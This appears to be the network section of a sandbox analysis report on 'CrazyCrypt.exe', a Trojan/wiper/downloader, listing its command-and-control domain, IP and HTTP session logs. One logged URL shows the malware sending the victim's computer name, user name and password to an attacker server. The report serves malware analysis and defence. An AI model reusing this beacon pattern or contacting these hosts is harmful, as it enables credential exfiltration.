75620d6a...595a | Network
Logo
Try VMRay Analyzer
VTI SCORE: 93/100
Dynamic Analysis Report
Classification: Trojan, Wiper, Downloader

75620d6ae02a9a3beb5eb47020012eee52001bf434304f4e77b43011a6e5595a (SHA256)

CrazyCrypt.exe

Windows Exe (x86-32)

Created at 2019-02-28 11:07:00

...

Network Overview

Hosts (1)
»
Hostname IP Address Location Protocols Reputation Status WHOIS Data
crazycrypt.store 178.33.107.134 France HTTP, TCP
Not Queried
Not Queried
DNS Queries (1)
»
Hostname Categories Names Source Reputation Status
crazycrypt.store - - Function Log
Not Queried
URLs (2)
»
URL Categories Names Source HTTP Status Code Reputation Status
http://crazycrypt.store/requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42 - - Function Log OK (200)
Unknown
http://crazycrypt.store/requests/website.php - - Function Log OK (200)
Unknown

Connections

DNS (1)
»
Operation Additional Information Success Count Logfile
Resolve Name host = crazycrypt.store, address_out = 178.33.107.134 True 1
Fn
TCP Sessions (1)
»
Information Value
Total Data Sent 0.21 KB
Total Data Received 0.49 KB
Contacted Host Count 1
Contacted Hosts 178.33.107.134:80
TCP Session #1
»
Information Value
Handle 0x47c
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 178.33.107.134
Remote Port 80
Local Address 0.0.0.0
Local Port 49158
Data Sent 0.21 KB
Data Received 0.49 KB
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 178.33.107.134, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 158, size_out = 158 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4096, size_out = 273 True 1
Fn
Data
Send flags = NO_FLAG_SET, size = 62, size_out = 62 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4096, size_out = 225 True 1
Fn
Data
HTTP Sessions (2)
»
Information Value
Total Data Sent 0.21 KB
Total Data Received 0.49 KB
Contacted Host Count 1
Contacted Hosts crazycrypt.store
HTTP Session #1
»
Information Value
Source Function Log
Server Name crazycrypt.store
Server Port 80
Data Sent 0.15 KB
Data Received 0.27 KB
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = crazycrypt.store, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42 True 1
Fn
Send HTTP Request headers = host: crazycrypt.store, connection: Keep-Alive, url = crazycrypt.store/requests/write.php?computer_name=XDUWTFONO&userName=5p5NrGJn0jS%20HALPmcxz&password=9C354B42 True 1
Fn
Data
Read Response size = 4096, size_out = 273 True 1
Fn
Data
HTTP Session #2
»
Information Value
Source Function Log
Server Name crazycrypt.store
Server Port 80
Data Sent 0.06 KB
Data Received 0.22 KB
Operation Additional Information Success Count Logfile
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Open Connection protocol = http, server_name = crazycrypt.store, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /requests/website.php True 1
Fn
Send HTTP Request headers = host: crazycrypt.store, url = crazycrypt.store/requests/website.php True 1
Fn
Data
Read Response size = 4096, size_out = 225 True 1
Fn
Data
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image